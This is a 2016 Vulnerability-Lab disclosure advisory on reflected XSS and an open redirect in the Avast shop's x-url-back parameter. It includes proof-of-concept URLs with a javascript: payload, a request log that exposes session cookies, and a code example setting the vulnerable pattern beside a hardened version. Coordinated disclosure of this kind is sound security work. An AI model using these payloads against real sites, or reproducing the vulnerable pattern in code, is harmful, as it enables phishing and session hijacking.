AVAST (Shop) #18 - Multiple Client Side XSS Vulnerabilities
Published 2016-05-25 by Karim Rahal [[email protected] / [email protected]] - @KarimMTV [http://www.vulnerability-lab.com/show.php?user=Karim%20Rahal]
www.vulnerability-lab.com
Document Title:
===============
AVAST (Shop) #18 - Multiple Client Side XSS Vulnerabilities


References (Source):
====================
http://www.vulnerability-lab.com/get_content.php?id=1635


Release Date:
=============
2016-05-25


Vulnerability Laboratory ID (VL-ID):
====================================
1635


Common Vulnerability Scoring System:
====================================
3.3


Product & Service Introduction:
===============================
Avast security software products are developed for Microsoft Windows, Mac OS X, Android and Linux users by AVAST Software s.r.o., a Czech private limited company. 
Avast was founded in 1988, and is headquartered in Prague, Czech Republic. It produces antivirus and security programs for personal and commercial use. In January 
2015, Avast had 21.4% of the worldwide security vendor market share. As of March 2015, Avast had 233 million users of its products and services worldwide. According 
to a company press release, Avast protects more than 30 percent of the consumer PCs in the world outside of China. The software products have a user interface available 
in 45 languages. Avast has 500 employees; 90 percent of whom work in the Czech Republic. Avast has 13 offices in Prague, Brno, Germany, China, South Korea, Taiwan & U.S.

(Copy of the Homepage: https://en.wikipedia.org/wiki/Avast_%28software_company%29 )


Abstract Advisory Information:
==============================
An independent vulnerability laboratory researcher discovered multiple client-side web vulnerabilities in the official Avast Shop online service web-application.


Vulnerability Disclosure Timeline:
==================================
2015-11-04: Researcher Notification & Coordination (Karim Rahal)
2015-11-05: Vendor Notification (AVAST Security Team - Bug Bounty Program)
2015-11-09: Vendor Response/Feedback (AVAST Security Team - Bug Bounty Program)
2016-02-26: Vendor Fix/Patch (AVAST Developer Team)
2016-05-25: Public Disclosure (Vulnerability Laboratory)


Discovery Status:
=================
Published


Affected Product(s):
====================
AVAST!
Product: Online Service - Web Application 2015 Q4


Exploitation Technique:
=======================
Remote


Severity Level:
===============
Low


Technical Details & Description:
================================
An open redirect occurs when an application reads a destination from a request parameter and redirects the user to it without validation. It is a 
common phishing primitive: the link the victim clicks points at a trusted domain, and only after the redirect does the browser land on the attacker's 
site. Reflected (non-persistent) cross-site scripting occurs when a value taken from the request URL is placed into the page, or used as a navigation 
target, without filtering, so a payload embedded in a crafted link executes in the victim's browser in the context of the vulnerable site as soon as 
the victim opens the link.

In the Avast shop, the `x-url-back` parameter of the `/1254/` order page (scope=confirmation) sets the target of the Cancel button. The value is not 
validated, so an attacker who sets `x-url-back` to an external URL sends the user to the attacker's website when Cancel is clicked. The parameter is 
not restricted to http(s) URLs either, so a `javascript:` URL supplied in `x-url-back` is executed as script in the origin of shop.avast.com when the 
button is followed; this is the reflected, client-side XSS.

The security risk of the non-persistent cross site scripting and redirect vulnerabilities is estimated as low with a CVSS (Common Vulnerability Scoring System) count of 3.3.
Exploitation requires no privileged web application user account and low user interaction (the victim opens the crafted link and clicks the Cancel button). 
Successful exploitation results in session hijacking, non-persistent phishing, non-persistent external redirects, non-persistent loading of 
malicious script code, or non-persistent web module context manipulation.
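The two sinks described above, an unvalidated redirect target that also accepts `javascript:` URLs, as an added example that is not the Avast shop's own code: the vulnerable pattern beside a hardened version that validates the parameter with the same URL parser the browser uses. The trusted origin, the default fallback page and the function names are assumptions made for illustration.

```javascript
// Added example, not code from the Avast shop. Node-compatible so it can be
// run without a browser; in a page the return value would be assigned to
// the Cancel button's href or to location.href.

const DEFAULT_BACK = "/1254/";                    // assumed in-app fallback
const TRUSTED_ORIGIN = "https://shop.avast.com";  // assumed trusted origin

// Vulnerable pattern: the query string value is used verbatim as the
// navigation target. "http://attacker.example" becomes an open redirect and
// "javascript:alert(1)" runs as script in the page's own origin.
function vulnerableBackUrl(queryString) {
  const params = new URLSearchParams(queryString);
  return params.get("x-url-back") || DEFAULT_BACK;
}

// Hardened pattern: parse the value as a URL relative to the trusted origin,
// allow only http(s), require the same origin, and hand back only the
// path/query/fragment so the destination can never leave the site.
function safeBackUrl(queryString, trustedOrigin = TRUSTED_ORIGIN) {
  const params = new URLSearchParams(queryString);
  const raw = params.get("x-url-back");
  if (raw === null) return DEFAULT_BACK;

  const trusted = new URL(trustedOrigin).origin;
  let parsed;
  try {
    // Relative paths ("/cart") resolve against the trusted origin. Absolute
    // URLs, protocol-relative URLs ("//evil.example"), backslash variants
    // ("/\evil.example") and javascript: URLs keep their own origin or scheme
    // and are rejected by the checks below. The WHATWG parser also strips
    // embedded tabs/newlines, so "java<TAB>script:" cannot slip past a
    // naive string-prefix filter here.
    parsed = new URL(raw, trusted);
  } catch (_e) {
    return DEFAULT_BACK; // unparsable input: refuse rather than guess
  }

  const schemeOk = parsed.protocol === "https:" || parsed.protocol === "http:";
  if (!schemeOk || parsed.origin !== trusted) return DEFAULT_BACK;

  return parsed.pathname + parsed.search + parsed.hash;
}

// Constructed sample inputs mirroring the advisory's PoC parameters.
const SAMPLES = [
  "scope=confirmation&x-url-back=javascript:alert(1)",
  "scope=confirmation&x-url-back=http://vulnerability-lab.com",
  "x-url-back=//vulnerability-lab.com/",
  "x-url-back=/cart?step=2",
];

for (const q of SAMPLES) {
  console.log(`${q}\n  vulnerable -> ${vulnerableBackUrl(q)}\n  hardened   -> ${safeBackUrl(q)}`);
}

module.exports = { vulnerableBackUrl, safeBackUrl, DEFAULT_BACK, TRUSTED_ORIGIN };
```

The hardened version deliberately returns a site-relative path instead of the parsed absolute URL: even if the origin check were later loosened to an allow-list of hosts, a bug there could not reintroduce a `javascript:` sink, because the scheme is never echoed back.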

Request Method(s):
				[+] GET

Vulnerable Service(s):
				[+] shop.avast.com

Vulnerable Module(s):
				[+] ./1254/

Vulnerable Parameter(s):
				[+] scope
				[+] x-url-back


Proof of Concept (PoC):
=======================
The vulnerability can be exploited by remote attackers without a privileged web application user account and with low or medium user interaction.
To reproduce the vulnerability for security demonstration, follow the information and steps below.


PoC: Cross Site Scripting (Client-Side)
https://shop.avast.com/1254/?scope=confirmation&transaction=T3YvW1tD0A&id=CuGRUzSWLS&x-url-back=javascript:alert("XSS516")

PoC or Exploitcode: Redirect
https://shop.avast.com/1254/?scope=confirmation&transaction=T3YvW1tD0A&id=CuGRUzSWLS&x-url-back=http://vulnerability-lab.com
Note: Click the Cancel button to trigger the redirect; the `x-url-back` value is used as the button's target.


--- PoC Session logs [GET] (Visiting Page with XSS payload) ---
https://shop.avast.com/1254/?scope=confirmation&transaction=T3YvW1tD0A&id=CuGRUzSWLS&x-url-back=javascript:alert(1)
GET /1254/?scope=confirmation&transaction=T3YvW1tD0A&id=CuGRUzSWLS&x-url-back=javascript:alert(1) HTTP/1.1
Host: shop.avast.com
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:29.0) Gecko/20100101 Firefox/29.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: locale2=en-ww; _ga=GA1.2.1525308852.1441304200; s_fid=2AFFF8AE00345EC4-35D71565E4ED40A3; osc_omcid=undefined; s_nr2=1445965096531-Repeat; 
s_vi=[CS]v1|2B15CC53053117C1-6000011080005E70[CE]; fbm_273679106083329=base_domain=.avast.com; IDT2=IDTR-52950-2X7dJugbPC3fm7FWVmXXM1MxZcsWxhZC5ct35444; 
__zlcmid=XPf3hHfSLhFLkq; __utma=1.1525308852.1441304200.1445962606.1445962606.1; __utmb=1.28.10.1445962606; __utmc=1; 
__utmz=1.1445962606.1.1.utmcsr=business.avast.com|utmccn=(referral)|utmcmd=referral|utmcct=/; cbsession2=gSnQxiCwH5hsTiB; 
cbsession1=OYOVzKaEX2=VQa4sXHkHAskwfa&PN59AmFBox=6E8n2UYlc87U20Y&CuGRUzSWLS=dLt8DezMcaRNSGb; s_cc=true; osc_v12=Website; osc_v13=Website%20%7C%20Direct; 
osc_v14=Website%20%7C%20Direct%20%7C; osc_v15=Website%20%7C%20Direct%20%7C; osc_v27=Website%20%7C%20Direct; osc_v42=web; osc_ot=wd>wd>>; x-otid=wd>wd>>; 
s_sq=%5B%5BB%5D%5D; p0=0=81861004-vdC8wg2zGkDUJnA4fScs; __utmt=1; _gat_cb=1; _dc_gtm_UA-58120669-2=1; BC-SID=eec994bc-93e7-4746-907f-39bc6a4c331b; 
BC-localIdSession="IDTR-52950-2X7dJugbPC3fm7FWVmXXM1MxZcsWxhZC5ct35444:1"; _gat_UA-58120669-2=1; osc_v28=Products%20%7C%20Store; 
RT=r=https%3A%2F%2Fstore.avast.com%2Fstore%3Bjsessionid%3DCC85041F36FD90DFE76CDFF6E1F6E156%3FAction%3DDisplayPage%26Locale%3Den_
NZ%26SiteID%3Davast%26ThemeID%3D38044100%26id%3DQuickBuyCartPage&ul=1445965101673&hd=1445965102043
Connection: keep-alive
-
HTTP/1.1 200 OK
Date: Tue, 27 Oct 2015 17:01:25 GMT
Server: Apache
Cache-Control: private
Content-Language: en
X-Robots-Tag: noindex,noarchive,nofollow
X-Frame-Options: DENY
Vary: Accept-Encoding,User-Agent
Content-Encoding: gzip
p3p: policyref="/w3c/p3p.xml", CP="NON DSP COR CURi ADMa DEVa TAIa HISa OUR LEG PHY ONL PUR COM INT LOC"
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Transfer-Encoding: chunked
Content-Type: text/html; charset=utf-8


Reference(s):
https://shop.avast.com/
https://shop.avast.com/1254/


Security Risk:
==============
The security risk of the client-side web vulnerabilities in the Avast shop website service is estimated as low. (CVSS 3.3)


Credits & Authors:
==================
Karim Rahal [[email protected] / [email protected]] - @KarimMTV [http://www.vulnerability-lab.com/show.php?user=Karim%20Rahal]


Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed 
or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable 
in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab 
or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for 
consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any vendor licenses, 
policies, deface websites, hack into databases or trade with fraud/stolen material.

Domains:    www.vulnerability-lab.com   	- www.vuln-lab.com			       		- www.evolution-sec.com
Contact:    [email protected] 	- [email protected] 	       		- [email protected]
Section:    magazine.vulnerability-db.com	- vulnerability-lab.com/contact.php		       	- evolution-sec.com/contact
Social:	    twitter.com/#!/vuln_lab 		- facebook.com/VulnerabilityLab 	       		- youtube.com/user/vulnerability0lab
Feeds:	    vulnerability-lab.com/rss/rss.php	- vulnerability-lab.com/rss/rss_upcoming.php   		- vulnerability-lab.com/rss/rss_news.php
Programs:   vulnerability-lab.com/submit.php  	- vulnerability-lab.com/list-of-bug-bounty-programs.php	- vulnerability-lab.com/register/

Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to 
electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by 
Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website 
is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), modify, use or edit our material contact 
([email protected] or [email protected]) to get a permission.

				Copyright © 2015 | Vulnerability Laboratory - [Evolution Security GmbH]™